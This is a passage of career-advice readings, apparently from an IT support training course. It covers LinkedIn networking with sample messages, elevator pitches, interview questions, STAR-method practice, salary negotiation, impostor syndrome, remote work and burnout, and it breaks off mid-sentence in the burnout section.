interested in working for. These people will have the information you need, beyond what’s publicly posted
online. They will understand the exact skills and qualities the hiring team is looking for. They’ll know the
status of currently open roles and upcoming openings, and they might even be able to connect you directly
to the hiring team.
If you are already connected to the right people, you can jump straight to Step 2 below. If you don’t
currently know such people, begin with finding and connecting with them as described in Step 1.
Step 1: Finding the right people
To begin, put together a list of the companies you’re interested in. The more companies you have on your
list, the more people you will be able to reach out to, and the more opportunities that will be available to
you. Don’t be surprised if your company list grows to 50 or more companies. It might sound like a lot, but
remember that not every company will have the right role available when you need it.
If you are not sure how to identify target companies for your job search, consider the following ideas:
 Search job boards for openings. If a company has ever posted a relevant role, it’s worth exploring
further.
 Go through your existing contacts and research the companies where they work. Even if you
don’t know anyone in your target role, your personal and professional contacts might be able to
introduce you to their relevant coworkers.
 Identify a target industry (e.g., online education, medical supplies, entertainment). If you know
one company within that industry, you can perform a search for its competitors to expand your
list.
 Map out companies located in your area (or companies with a remote workforce, if you are
looking to work remotely). You want to make sure you can definitely be considered for any
opportunity you uncover.
Remember, your target companies do not need to have open jobs posted—you will find out exactly what is
currently available there through your networking conversations.
Step 2: Connecting via LinkedIn
Once you know the companies you are interested in, you can start connecting with relevant people. The
method described here uses LinkedIn because it is accessible to most people. You can also ask for
introductions from mutual connections, attend professional events to meet people, post in networking
communities online, or use any other way you prefer.
To find people through LinkedIn, begin with performing a LinkedIn People Search using your target job
title as the search string, and setting a filter for “Current Companies.” See below for an example searching
for a Data Analyst at Coursera.
Review the profiles that come up to identify people you want to reach out to. Focus on people you’d like to
learn from and that you think you can build a rapport with based on their background, interests, and even
their tone of communication. Keep in mind that people with well-developed LinkedIn profiles—that
include profile photos, summaries, and other details—are more likely to reply to you than those who have
very basic profiles, because they are likely to be more active LinkedIn users.
Once you identify a person you might be interested in speaking to, send them a connection request with a
note explaining why you are reaching out.
Here is a sample LinkedIn outreach message:
Hi <name>, I discovered your profile because of the interesting work you do as a <role> at <company>. I’d
appreciate an opportunity to ask you a few questions to learn more about what you do and what it is like to
work at <company>. Thank you in advance for connecting with me!
Note that some of your connection requests may go unanswered. Don’t get discouraged or take it
personally. Many people are too busy or simply don’t monitor their LinkedIn messages. The great thing is
that LinkedIn provides you with access to a large number of professionals, and it’s a great idea to reach out
to a lot of people.
Step 3: Schedule and prepare for the conversation
Once you’ve established the connection, you can ask your new contact for a time to speak. It is important
to be open to communicating via the connection's preferred approach (in-person, video, phone, in writing,
etc.), but ideally, you want to schedule a live conversation. It’s generally a more effective way to build a
relationship, and can often make it easier to get your specific questions answered.
Make scheduling easy by suggesting a specific time to speak, offering to work around their calendar, and
sending out a calendar invitation with information on how you will connect (phone, video conferencing,
etc.).
Here is a sample meeting request message:
Thank you for accepting my connection request! As I mentioned, I reached out because I’m researching
<industry/company> and would really appreciate an opportunity to ask you a few questions about your
experience in <role, company>. Would you be open to scheduling a 15-minute video or phone call on <date,
time>? I’m also happy to adjust to your schedule if you prefer another time.
Note that some people find it easier to provide information in writing. If you don’t get a response to your
original request for a conversation, you can follow up by asking whether it would be easier for them to
answer a few questions over email. Remember, everyone is different and it’s important to gauge and adjust
to the style of the person you are reaching out to!
Don’t be discouraged if someone does not reply to you immediately. People are busy. Since you have
already established a connection, it’s a good idea to follow up after a few days, and then again a week later
to give them a chance to reply.
If you still don’t hear back after a couple of follow-ups, you can assume this person is too busy at this time
to speak with you and move on to other potential contacts. Remember that while this is a process of
developing personal connections, it’s also a numbers game, and you should plan to reach out to a lot of
people!.
Before moving on, acknowledge your decision to your new contact—a quick note will help ensure there is
no awkwardness so you can easily reconnect in the future.
Here is a sample moving-on note:
I'm sorry we haven't been able to connect. I definitely don't want to flood your inbox with requests, so I just
wanted to thank you again for connecting with me, and if you do end up having some time to chat, please let
me know.
Preparation
Once the conversation is on the calendar, it’s time to prepare. Remember, your focus should be on learning
about your target role at the company and determining the best ways to connect to new opportunities.
Things you’ll want to focus on include:
 What is the day-to-day like in the role? What is the team structure, how are priorities decided, what
do they like about their work, and what do they struggle with?
 What skills and experiences do the hiring team look for? What is essential, and what is nice-to-
have?
 Do they think your skills and background are a good fit for the role, or are there ways you can
improve your candidacy through education or experience?
 What is the best way to monitor and apply for opportunities? Is there anything coming up that is
not yet posted on the careers page?
 Are there any other people they can recommend that you speak with?
To inform your questions, you’ll want to conduct thorough research on the person you are speaking with,
the company they work at, and your target role. Consider the following sources of information:
 Your contact’s LinkedIn profile, and any information it links to. Look for information to inform
your questions as well as anything that can help you build rapport, such as shared volunteering
interests, hobbies, school experience, etc.
 Job descriptions for your target role at the company (if available). During the conversation, you’ll
have an opportunity to clarify requirements and responsibilities.
 LinkedIn profiles of people working in your target role at the company. You want to understand
their skill sets and backgrounds to get additional insights into what it takes to succeed in this role.
 Company website. You should have a good understanding of the company’s mission, business,
and anything else they chose to highlight to the public.
 Company reviews on platforms such as Glassdoor. It’s a great idea to see what people are saying
about the company, so you can ask more specific questions about the culture.
 News about the company. Just in case there is something significant happening at the company,
you want to be aware of it.
 Company careers page. Make sure you know which roles are currently posted so that you can ask
about the status, and about applying to them directly.
Step 4: Speak with your new contact
Speaking with strangers does not come naturally to many people. If you are feeling uncomfortable before
or during your first few conversations, that’s completely normal! It will get easier with time as you develop
the invaluable skill of networking.
Remember that the other person is also going into a conversation with a stranger (you) and might not
know what to expect. To make both of you comfortable and to help build rapport, be ready to set the
structure for the conversation.
 Remind them about who you are, why you reached out, and what your goals are for the
conversation. By this point, you will have done extensive research in preparation for the
conversation, but your new contact might not have had the time to look at your profile and doesn’t
know why exactly you reached out. Help them out by starting with a brief overview of your
background and the reasons for the conversation.
 Monitor time. Conversations like this generally last 15–30 minutes. Make sure you respect the
other person’s time by keeping the meeting to the length you had originally agreed upon, unless
the other person wants to continue talking.
 Make it about them. While you are there to learn, the person you are speaking to is being generous
with their time, and it’s your responsibility to make them feel valued and appreciated. Explain why
you wanted to talk to them and show the research you’ve done. Honest praise and genuine
engagement go a long way.
 Listen more than talk. Since you are there to learn about their experience and company, the
primary focus of the conversation should be on the other person. Some people might be more
talkative, while others may need more input from you in order to engage. Ideally, they should be
speaking for 50% to 80% of the conversation. Don’t be afraid of short pauses, and be respectful
and patient if they need time to gather their thoughts.
 Take note of action items as you go along. There are many action items that can come out of a
conversation like this: you might need to send the other person your resume, they might offer to
connect you with someone else, either one of you might want to share articles or resources that
comes up in the conversation, etc. It’s your responsibility to keep a record of these action items, so
you can follow up on your promises and make it easy for the other person to remember theirs.
 Close the conversation by clarifying what’s next. Thank them for their time, summarize what you
have learned, and go over any action items from the conversation. The goal is to make the other
person feel useful and appreciated—after all, they’ve been generous with their time.
Asking for a referral
Getting a referral is an ideal outcome for a networking conversation. However, not every conversation will
end in a referral—sometimes there will be no role available, and sometimes the person might not be open
to referring you for a variety of reasons. Make sure not to take this personally or push too hard—their
reasons may have nothing to do with you specifically. It’s important to respect their boundaries and
comfort levels. It is also important to go into the conversation without the expectation of a referral.
Focusing on learning about the role and getting advice from your new connection will take the pressure off
you and them.
If, during the course of the conversation, you confirm that there is a role available that you are qualified for,
do consider asking for a referral. You should be able to sense from the conversation whether the person
thinks you could be a valuable addition to their team and therefore open to referring to you. If you have
any doubts about that, provide an easy way for them to say “no” to you to avoid an awkward situation. For
example, you can ask, “Would you be able to refer me to this role, or do you recommend I apply online?”
If your contact agrees to refer you, make sure you understand exactly what’s required from you. Depending
on the company’s system, you might need to apply through a special referral link, have your contact
submit your resume internally on your behalf, or apply online and then have your contact reach out to the
relevant member of the hiring team.
Step 5: Follow up
Congratulations on completing the conversation!
Send a thank-you email
Always send a thank-you email within a day or two to the person who has been generous enough to share
their time and expertise with you. Go beyond the basic “thank you” and reinforce the connection you’ve
made by:
 Reiterating what you have learned

 Following up on your action items from the conversation. Include any materials you had promised
to share and list out what else you are going to do based on the conversation (make sure to follow
up on those as well when the time comes!)
 Gently reminding then about any action items the other person had volunteered for
 Offering to repay the favor by sharing any information that might be valuable to the person, or
offering to connect them with people in your network
Here is a sample thank-you note:
Hi <name>,
It was great to catch up with you today and hear about the incredible work you are doing at <company>, and
I was excited to learn about our shared interest in <x>. Here is a link to the article I had mentioned on <topic>
that I thought you might enjoy.
Thanks again for sharing about the <role> opening with me and sharing my resume with the hiring manager!
My resume is attached. Please let me know if you have any questions or need anything else from me.
Again, it was great to speak with you. Thank you for your time and willingness to share your experience with
me! Please let me know if I can ever be of any help. I have a pretty extensive network in <industry> and would
be happy to introduce you to any of my connections.
Maintain the connection

Some conversations naturally lead to ongoing relationships where people find a lot in common and
naturally stay in touch, while others don’t create enough rapport to solidify the connection. Even if your
conversation falls into the second category, as long as you feel that you’d like to keep this person in your
active network, there are actions you can take to develop the connection over time. The key to developing
your new connection is finding natural touchpoints moving forward. For example:
 Share updates on your job search. Follow up on any advice from the conversation once you have a
chance to act on it. Your connection will appreciate that you valued their guidance and will be glad
to know if it helped. Also, remember to update and thank them once your job search is complete.
 Send interesting information as it comes up. If you come across an article or information that
reminds you of the person, it is a great reason to send them a quick note.
 Engage on LinkedIn. If your new connection is active on LinkedIn, commenting on their posts and
updates is a great way to continue the conversation.
 Add them to your celebrations calendar. Add them to your holiday mailing list. In addition, if any
important dates, such as a birthday, come up in the conversation, make sure to mark your
calendar and send your congratulations.
Do be mindful about your rate and volume of outreach, as you don't want to overdo it. Make sure to
establish a pace that feels right for the relationship.
Continue Growing Your Network
You now know how to find, reach out to, and develop relationships with people who can help your job
search through insider information. Not every conversation you have will result in an immediate job lead,
but many will. Networking is the most reliable way to get interviews, and it’s available to everyone with a
LinkedIn account, effective strategies and some grit.
Don’t be discouraged if you don’t feel great about your first few conversations, or if they don’t result in
referrals. It is normal to feel uneasy about speaking with strangers, particularly at first. It’s a skill you need
to practice. Each conversation you have with an industry professional is a win. You are building one of your
most valuable professional assets—your network—one person at a time!
Learn More About Developing an Elevator Pitch

When interviewing with potential employers, it’s important to communicate who you are,
your value as an e-commerce or digital marketing professional, and what you’re searching for
in a job. A simple way to do this is with an elevator pitch. An elevator pitch is a short,
memorable description that explains an idea, business, or service in an easy-to-understand
way, typically in 60 seconds or less (the average amount of time of an elevator ride).
While an elevator pitch is usually specific to an idea or a product, you can also use it to sell
yourself as a professional to potential employers. In an interview, a strong elevator pitch can
be used to stand out to your interviewer. It can be used to help explain why you’re a good fit
for the role or to answer the popular interview question “tell me about yourself.” This reading
helps you prepare your elevator pitch to sell yourself and the value you can provide as an IT
Support Professional.
Please examine these resources before continuing with the rest of the reading:
Showing your best self during the interview
Interview role play: Operating Systems
Amir Interview - Creating a Company Culture for Security | Coursera
Creating you elevator pitch
Provide an introduction
Start by providing an introduction. Introduce yourself and give a brief overview of your
professional background. Explain some job roles you’ve had, your years of work experience,
and the types of industries you’ve worked in. If this is your first job IT Support, mention some
of your past roles that are unrelated.
Describe your work-related background
Even if you’re interviewing for your first internship or job in IT Support, it’s important to
clarify that this is what you want to do as a career.
For example, you could say, “I want to apply my excellent technical problem-solving skills to
find and solve information technology problems for internal and external users.”
Show your excitement
This is where you share your passion for the field and why you want to work in the industry. If
you’re motivated to sell products online, mention that. This is also a good time to talk about
your goals.
For example, you could say, “I love solving information technology issues because doing it
lets me research and apply new IT solutions and technologies. Long term, I’d love to develop
my knowledge of IT problem solving for company IT infrastructures.”
Communicate your interest in the company
This has been left the same. The example works for most fields. IT support works with
Google Shopping and with other online services.
Communicating why you are interested in the company—and not just the role—is a great way
to help the interviewer recognize that you are knowledgeable about the company.
For example, if you were interviewing for a position for Google’s Shopping team, you could
say, “Google Shopping helps connect millions of people to the products they desire or need.
As a long-time Google Shopping user, I’m looking forward to the opportunity to be a part of
that mission and provide outstanding support.”
Elevator Pitch Examples
These have been left the same. They are good examples of elevator pitches. The only way to
replace them would be to interview and get pitches from people in IT.
To bring the structure of an elevator pitch to life, check out two examples of elevator pitches
at Google. The first is by Sean, a Marketing Manager on the Google Ads team. The second is by
Joi, an Associate Product Marketing Manager.
Sean
Marketing Manager, Google Ads
I’m Sean, a Marketing Manager for Google Ads, with over a decade’s worth of experience in
the field of digital marketing, most of that with Google. When I went to school, I didn’t even
know this industry existed. I majored in English because I liked reading and writing. My first
employer in digital marketing took a chance on me because of my experience with client
management and spreadsheets, and they figured they could teach me about digital
marketing. I’m glad the industry and I found each other. Google is always innovating, which
means when you work in this field you never stop learning. My first company actually ran a
blog all about the latest changes to Google Ads (then called AdWords), and because of my
English degree, I took a keen interest in the blog. In a few months, I was managing the blog,
and it was through my posts on that site that Google found me. It’s been wonderful to be on
the team that announces the latest changes and updates to Google Ads. Because of my
hands-on experience buying ads myself, I can immediately see how somebody’s workflow will
change after an announcement. I love being able to tell Google’s story to our advertisers so
that companies of all sizes can continue to find success and grow their businesses.
Joi
Associate Product Marketing Manager
I’m Joi, an Associate Product Marketing Manager at Google with 10 years experience as a
content creator for YouTube and organic social channels.
Outside of work, I run my own beauty e-commerce business, an experience that has helped
me develop a plethora of skills around digital marketing and paid advertising, project
management and operations.
My entrepreneurial mindset paired with my love for creativity is what led me to a company
like Google. I thrive in ambiguity and love strategizing and solving problems from the ground
up.
Key Takeaways
Creating a 60 second or less elevator elevator pitch is a great tool to use to quickly share who
you are. Use an elevator pitch to introduce yourself to career and business connections in the
future. You can even use your elevator pitch in other types of situations, like meeting new
friends or new colleagues.
Ask the Interviewer Questions

In addition to an interviewer asking you questions, it’s important that you ask the interviewer
questions as well. Asking questions helps you learn more about the role and it shows your
interest in the role.
In this reading, we list several questions you should consider asking your interviewer and
explain why you should ask the question and the intention behind it.
Why ask your interviewer questions?
One reason to ask your interviewer questions is that it helps you determine if you are
interested in the role. One mistake people make in interviews is believing they are the only
one being interviewed. Remember, you are also interviewing the organization to determine if
you would like to work there! Ask questions to help determine if the organization is a good fit
for you.
Another reason to ask questions is that it shows your interest in the role. When possible,
make your question specific to the company you are interviewing for. For example, imagine
during your pre-interview research, you come across an article discussing the company’s
entrepreneurial culture. You can mention that you read about the organization’s
entrepreneurial culture. Then, ask how that culture gets represented in the company.
When to ask your interviewer questions?
Often, at the end of the interview, the interviewer will ask you if you have questions. This is
the perfect time to ask your questions. The interview may end without any questions, that’s
OK too. It’s typically best to respect the interview time frame rather than ask questions past
the time.
If the interviewer doesn’t confirm they will allow time at the end for questions, one way to fit
them in before time runs out is to ask during the interview. When asking during an interview,
ensure the questions don’t disrupt the flow. For example, if the interviewer mentions
available training for the role, you can comment that you are interested in the company’s
training. You can then ask them what type of training is available for the position and its
delivery.
Additionally, if you are unable to ask any questions during the interview, you can follow-up
with an email. Make sure your questions are directly related to the role and related to
something you are genuinely interested in.
Example questions to ask your interviewer
How do you evaluate success in this role?
This question helps you better understand what skills or qualities make someone successful
in the role. If the interviewer mentions skills or qualities you have, you can then discuss how
you applied them in your previous experience.
Can you describe the typical day of someone in this role?
It’s important to know the day-to-day activities of the position. Does this match with the type
of role you’re interested in? If it doesn’t, the role may not be a fit for you. This question also
confirms that the tasks for the role match the job description.
How would you describe the company’s culture?
A company culture is the attitudes and behaviors of the company and its employees. Asking
this question helps you better understand if the company’s culture is a fit for you. For
example, if you’d like to work for a company that supports creativity and encourages new
ideas, look for that type of information when someone describes the culture.
What do you like about working here?
Similar to the question about culture, this question provides the positive qualities of a
workplace. Ensure these qualities match with what you’re interested in for a work
environment.
Is there any training for the role and how is the training delivered?
If you’re interested in receiving training for a role, consider asking this question. Additionally,
you may want to ask how the training will be delivered, such as digitally, in-person,
shadowing a current employee, or another method. Shadowing is when you closely observe
another employee perform the role.
Do you have any questions or hesitations about my qualifications or experience?
If you ask this question at the end of an interview, it gives you a chance to address any
concerns the interviewer has about your work background. Sometimes the interviewer is
interested in an experience that you have, but you haven’t included on a resume. This is the
perfect question to address that discrepancy.
Key takeaways
When interviewing, you should ask questions to learn more about the organization and show
your interest in the role. When doing pre-interview research, write down any questions you
may have for the organization or the role. It’s a best practice to have at least four questions
prepared before the interview. If there is time available and the question seems appropriate,
ask it!
Activity Overview
In this activity, you will answer two common behavioral interview questions using the STAR
method.
In an interview, you may be asked behavioral interview questions. These types of questions
require you to share a time when you were faced with a particular situation or had to practice
a certain skill. The STAR method is a helpful strategy for answering behavioral interview
questions in a clear, organized, and engaging way. As you’ve learned, STAR stands for
“situation,” “task,” “action,” and “result.”
Be sure to complete this activity before moving on. The next course item will provide you with
a completed exemplar to compare to your own work. You will not be able to access the
exemplar until you have completed this activity.
Scenario
Review the scenario below. Then complete the step-by-step instructions.
Using the STAR method to answer behavioral interview questions gives interviewers a sense
of who you are and why you’ve applied for the role. This method can make your responses
easy to follow by providing a logical structure to each story you share. Preparing and
practicing responses using the STAR method in advance can also help you feel more
confident going into an interview.
In this activity, you will prepare responses to two common behavioral interview questions.
First, you will recall and record notes about experiences you’ve had in the past that
demonstrate your key skills. Then, you will select two questions from a list of frequently-
asked behavioral questions in IT support interviews. You will answer each of these questions
using the STAR method. And optionally, you will practice answering these questions and
others aloud in front of a mirror, friend, or family member.
Step-By-Step Instructions
Step 1: Access the template
To use the template for this course item, click the link below and select “Use Template.”
Link to template: STAR responses
OR
If you don’t have a Google account, you can download the template directly from the
attachment below.
Template_ STAR responses
DOCX File
Step 2: Identify experiences that demonstrate your skills

Research the most common IT support related skills that companies are looking for by
reviewing job descriptions on platforms like Indeed, LinkedIn Job Search, or CareerBuilder.
Then, consider the experiences you’ve had that demonstrate those types of skills. These may
be past work experiences, school projects, volunteer positions, or any other relevant
activities you’ve done—even the completion of this program.
Add notes on at least three of those experiences to the Experiences that demonstrate my
skills section of the STAR responses template.
Step 3: Select interview questions
During a job interview, you may be asked behavioral interview questions. Your answers to
these questions should demonstrate how you handled a specific situation in the past and
indicate how you might handle a similar situation in the future.
Review the list of Common Behavioral Interview Questions for IT Support Professionals on
the second page of the STAR responses template. Consider which questions would allow you
to describe the experiences you recorded in Step 2. Then, select two of the questions to
answer, copy them, and paste them in the Question 1 and Question 2 sections of the
template.
Step 4: Describe the situation
Using the STAR method helps organize your responses following a story-like structure. To
review, STAR stands for “situation,” “task,” “action,” and “result.”
Begin by describing a particular situation, challenge, or event you experienced. First, review
Question 1 and the experiences you added to the STAR responses template. Select an
experience you had that relates to the question. Then, in the Situation section, add 2–3
sentences describing the situation. Be as specific as possible, providing enough detail to help
the interviewer understand the context in which the situation took place.
Step 5: Describe your task

Next, relate that situation to a task that you were required to complete.
In the Task section, add 1–2 sentences describing what you were asked to do, how you were
involved, or what you were responsible for in the situation. Explain exactly how you fit into
the story you’re telling.
Step 6: Explain the actions you took

Now that you’ve given the interviewer a sense of what your role was, explain the action you
took to meet the challenge or solve the problem.
In the Action section, add 2–4 sentences describing the action or actions you took to
accomplish the task. Give specific details that demonstrate your abilities and skills. This part
of your response may take the most time to cover, as you can highlight multiple skills here.
Step 7: Share your results

Finally, share the results that you achieved.
In the Results section, add 2–4 sentences discussing the outcome of the actions you took and
the impact you had. Where possible, use data—such as numbers and percentages—to
reinforce your response. If you’re sharing an experience that came with challenges, you may
also want to share the lessons you learned.
Step 8: Answer the second question

Repeat steps 4–7 to answer Question 2 using the STAR method.
(Optional) Step 9: Practice your responses aloud

To prepare yourself to answer these types of questions verbally, practice your answers out
loud in front of a mirror or with a friend or family member. Try answering additional
questions from the list of Common Behavioral Interview Questions for IT Support
Professionals in the same manner.
Pro Tip: Save the template

Finally, be sure to save a blank copy of the STAR responses template you used to complete
this activity. You can use it for further practice or in your professional projects. This template
will help you work through your thought processes and demonstrate your experience to
potential employers.
What to Include in Your Response
Be sure to address the following criteria in your completed STAR responses:
 A description of three experiences that showcase your skills

 A selection of two interview questions to answer
 A description of the following as it relates to each question:
o A situation you experienced (2–3 sentences)
o The task you were asked to complete or your responsibility in the situation (1–2
sentences)
o The actions you took to meet the challenge or solve the problem (2–4
sentences)
o The result of your actions (2–4 sentences)
Did you complete this activity?
Prepare for Interviews with Interview Warmup
Now that you have the skills and knowledge to work as an IT support professional, it’s time to start
preparing for interviews. Interview Warmup is a tool that helps you practice answering questions to get
more confident and comfortable with interviewing.
Get started
Follow these steps to start a 5-question practice interview related to IT Support:
1. Go to grow.google/interview-warmup.
2. Click Start practicing.
3. Select the “IT Support” practice set.
4. Click Start.
It takes about 10 minutes, and the questions will be different every time. Each question set will have two
background questions, one behavioral question, and two technical questions, simulating what you would
encounter in a real interview. You can try as many practice interviews as you want.
You’ll also have the option to access the full list of interview questions if you’d like to review more of the
questions available or focus on specific topics.
How it works
Interview Warmup asks interview questions for you to practice answering out loud. It transcribes your
answer in real time so you can review what you said. You’ll also review insights, which are patterns
detected by machine learning that can help you discover things about your answers and identify ways to
keep improving.
Here are a few examples of questions the tool might ask:
 Your manager asks you to make a training program for all employees after a big security
vulnerability incident. What kind of training would you create, and why?
 Why is it important that you can manage your entire fleet of desktops and servers via enterprise
management software?
 How do you stay up to date with recent security incidents, threats, or defense methods?
 You've been put in charge of upgrading a company's desktop machines to the latest versions.
There are about 200 employees. How would you approach this?
 A company is configured to take full backups every 14 days, and differential backups every day.
Describe some pros and cons for this setup.
 Why would a company spend resources on multiple technologies like network firewalls, desktop
firewalls, anti-virus software, and network scanners instead of just relying on one?
Here are some of the insights that Interview Warmup provides:
 Talking points: The tool lets you know which topics you covered in your answer, such as your
experience, skills, and goals. You’ll also be able to view other topics that you might want to
consider covering.
 Most-used words: The tool highlights the words you used most often and suggests synonyms to
broaden your word choices.
 Job-related terms: The tool highlights the words you used that are related to the role or industry in
which you are preparing to work. You’ll also be able to view an entire list of job-related terms that
you might want to consider including in your answer.
Interview Warmup gives you the space to practice and prepare for interviews on your own. Your responses
will be visible only to you, and they won’t be graded or judged.
Key takeaways
Practicing for interviews is an important skill for your career in IT support. Using Interview Warmup can
help you practice interview questions and receive feedback in real time. As you practice, you will gain
confidence and be able to prepare more polished responses for common interview questions.
Before you Accept, Negotiating the Contract

Picture this: you have made it through the end of the interview process and great news- the
hiring manager wants to offer you the position. Your first instinct may be to accept the offer
without paying attention to all the details in the offer contract. You should resist this instinct
and do your due diligence. Read through the offer letter carefully, looking at what is offered
aside from salary, compare it with what is expected for the role, and most importantly
remember that this is a negotiation, but you have power in this situation. Negotiating a job
offer is an essential part of the interview process, even for entry-level roles. Let's take a closer
look at how to be prepared when the time comes.
Research
Hopefully by this time, you will have done your research on the role - not only on the
qualifications for the job, but also the average salary expectations. Knowing the average
salary for an IT support technician in your location is the best way to determine if the offer
you received is fair. Keep in mind what makes you stand out as a candidate as it might give
you insight as to whether you should ask for more or identify when you have received a
generous offer. Always ask for the range that the team is targeting and which components of
the offer the company will consider. For example, does the company offer sign-on bonuses?
Additional equity? Merit increases? This will give you an idea not just of what you are
receiving at the moment but the potential for growth as well.
Don’t just focus on money

A salary that compensates you well for your work is great, but you must also consider
benefits. You want to keep in mind some of the things that are important to you and whether
or not a potential employer can provide access to them as a part of your compensation
package. This would include sign-on bonuses, vacation days, paid time off, sick days,
retirement plans, healthcare coverage, and more. If they are unable to increase your starting
salary, you may want to explore asking for benefits or more perks to be included in your
starting package.
Negotiate
In certain cases, you might be asked if you have a rate or salary range in mind at the
beginning of the interview process. While this question might seem straightforward, it is
important to not respond with a specific number before knowing the actual number for the
role because the moment you do, you will be giving up negotiating power.
A contract negotiation often starts with the potential employer providing you with an offer
letter with general details about your compensation package. This is their initial offer and
companies will often expect your request changes to the package, whether it be more money
or additional benefits. This is referred to as a counter-offer. Once a counter-offer is made the
potential employer will try to reconcile what you are asking for with what they initially
proposed and find a middle ground if possible.
Always remember that negotiation is your right and it is not considered impolite. On the
contrary, showing initiative in negotiating displays your confidence and tenacity to advocate
for yourself. If you react with a well-researched counteroffer, it will also demonstrate that you
are intelligent enough to know your value.
Focus on long-term growth
While a negotiated offer is common, don’t be discouraged if your counter offer is not met.
Unless you have competing offers, you will likely still decide to take the job if it’s a fair offer. If
it makes practical sense to take the initial offer, you should consider reevaluating in 12
months or whenever you have amassed more experience and will have more leverage to work
with.
Pay close attention to the following video, which will demonstrate an interview where the
candidate displays their negotiating abilities.
Imposter Syndrome
Impostor Syndrome
Professionals in many fields including IT sometimes feel like they don’t belong in their positions. They look
at others they work with and feel like the other people are real professionals in the field and they are
impostors and are not worthy of their positions. They feel like they got into their fields through luck or
timing, and they are worried others will find out they are impostors. This is impostor syndrome. This
reading will help you understand impostor syndrome and how to deal with it if you see it in yourself.
How do you know if you have Impostor Syndrome?
 You feel like all the success you have in your career came from luck, not learning skills and working
hard.
 You are afraid someone will discover you are not qualified for your position. Once someone does,
you will lose your position.
 You will be perceived as dishonest, and you won’t be able to work in your field again.
 You feel like you need to put a lot of extra effort in to try to be worthy of the position.
 If you do something well and your team members or supervisors praise you, you feel you are not
worthy of the praise.
 You sometimes don’t try to reach for goals because you feel like they are unattainable goals.
How to deal with Impostor Syndrome
First, don’t feel bad about yourself if you have Impostor Syndrome. Many professionals in your field share it
with you. There are even Nobel Prize winners who have impostor syndrome. It’s very common. You are not
an impostor, though. You worked hard to get this far. Here are some ways to deal with impostor syndrome:
 Look at all you’ve done in the course and in your experiences. Keep a journal of all your
accomplishments. Every time you think of another one, write it in the journal. Be sure to include
your achievement of successfully completing this IT Support Specialist certificate. When you feel
like an impostor, read through your journal and look at what you have already accomplished.
Write down any new accomplishments in the journal as you make them.
 Become a teacher - teach someone about your field. Let them ask questions and answer those
questions the best you can. You might find out you know a lot more about the field than you
thought you did.
 Take out your accomplishment journal sometimes, read it, and celebrate your accomplishments.
You can even reward yourself with something you really want and celebrate your success.
 Every time you doubt yourself, think about a real problem you solved or an important task you
completed successfully on the job. Find something good you did that week. Maybe you were able
to troubleshoot a problem others struggled with, and you solved the problem successfully.
Acknowledge your accomplishments and you will find plenty of proof you are very worthy of your
position, and you are a true professional in your field- not an impostor.
Taking risks
Once you have beat impostor syndrome and proven to yourself you are worthy of your position, you may
fail in a task or on a project and feel like an impostor again, or a failure. Even the most well known
professionals, scientists, inventors, and other innovators have failed, and they have failed often. Failure
does not make you an impostor. Instead, by learning from your failures, you will become even better at
what you do.
To move ahead in your career, sometimes you need to take risks. Here are some tips for dealing with risk:
 When you fail at something, learn from the failure. What went wrong, and how can you do it better
next time?
 Examine each project or task carefully, and think about it succeeding. What is the outcome? It may
take a few failed tries to get to that outcome, but if you never start, you will never achieve that
outcome.
 Find others on the team who have done similar projects. Ask them for advice about how they
worked on those projects. If the project fails, share what you learned with them and ask them for
advice on how to avoid the same problem from happening again.
Safe identity workspaces
Safe identity workspaces are a recent development in workplace environments, and their design lets
employees share their ideas freely. In these spaces, employees feel a strong sense of belonging. They feel
like essential parts of the team, and are less likely to be intimidated. In your career, you may work in one of
these environments, as many companies are moving toward them and away from traditional offices.
In a safe identity workplace, there is a leader, but the leader pays close attention to what the employees
have to say and acts on their suggestions and ideas. In some of them, managers and supervisors are open
to constructive criticism from the team. All team members in the workspace are treated as equals and
encouraged to move forward in their careers.
Key takeaways
 Impostor Syndrome happens when a professional in a field feels unworthy of their position. People
with impostor syndrome are scared someone will find out they are impostors and that they got
their positions through luck and timing.
 You can fight impostor syndrome by beating self doubt and using your accomplishments to prove
to yourself you are a worthy professional in your field
 Failure is always a possibility, but if you don’t take risks, you won’t move forward in your career.
Learn from your failures.
 Safe identity workspaces are a recent development, and they provide a workspace where everyone
is treated as an equal. This encourages creativity and helps employees experience their parts as
important members of the team.
Working from Home for the Win (WFH FTW)

Working from home for the win(WFH FTW)
Working from home is increasing in popularity. Every day, more and more employees want to work from
home. At the same time, more and more companies are evaluating the pros and cons of having employees
work from the comfort of their homes and are looking for options they can provide to their employees,
such as working from home full time or developing a hybrid model.
Working from home has its benefits. You are independent, no longer commuting, more productive. You
save money on gas and clothing while being able to have more quality time with family and friends, an
improved work-life balance, a flexible schedule, and more job opportunities, to mention a few.
What about a hybrid model? A hybrid model means some days at home and some days at the office. This
raises questions, like how to choose which days to work at home? How many days in a week? A hybrid work
schedule is a flexible approach where the employee and the employer agree on a mixed work environment
of working from home and working at the office.
But the reality is, no matter if you are a full time or a hybrid work-from-home employee, you will need to
set up your home work environment to suit your job responsibilities.
When working from home, you will need some standard and basic services and accommodations like
reliable high-speed internet connection, a computer or laptop, a phone, headset, desk, and chair.
Depending on your job, you may also need to have an accessible printer, some specific programs, an extra
monitor, and so on. Also, you will need to have a noise/distraction free environment. As an IT support
specialist working from home, if you are traveling to the customer location, you will need to have a toolbox
with the necessary tools to do your job, along with a reliable way of transportation.
One of the challenges of working from home is scheduling your work week and staying organized. Before
starting to work from home, make sure to set some ground rules:
 Decide your working hours. When you start your day, when you end it, lunch time, brain breaks,
etc. After you decide your working hours, try to stick to them as much as possible.
 Plan your working tasks. Keep track of assignments for the month, the week, and the day. It will
keep you organized and help you to meet your deadlines.
 Set some working rules to your loved ones. Establish when it is appropriate to get your attention,
appropriate noise levels, and what is considered an emergency.
 Create boundaries between your work and your household chores.
 Learn how to prioritize your work.
Now that you have all that you need to start working from home successfully, it is time to learn to take
advantage of the tools available to enhance collaboration. There are a few tools that will improve your
productivity when working from home. Depending on your job, you will have these tools set up by your
employer, or maybe you will have the flexibility to choose the one that is right for you. Whatever is the case,
familiarize yourself with these types of tools:
 Calendar sharing
 File sharing
 Instant messaging
 Document synchronization
 Cloud storage
 Video-conferencing
Key takeaways
To successfully work from home:
 Set your work space to be comfortable for you

 Set a working schedule that works for you
 Be sure to have all the tools, software and equipment you need to perform your duties
 Take advantage of all the tools available for you to make your job productive
Burnout
Burnout
Burnout is prevalent in every possible industry and negatively affects work performance,
interests in personal life, relationships, and health. Burnout occurs when there is excessive
stress surrounding a job. As you progress through your career in IT Support, it’s important to
recognize symptoms of burnout and work on managing the symptoms in advance.
Career Burnout
Some of the many reasons why burnout occurs are as follows:
 Unclear purpose at your work.

 The job is overly demanding
 The work is unclear
There are additionally many common signs of burnout. Here are some common signs of
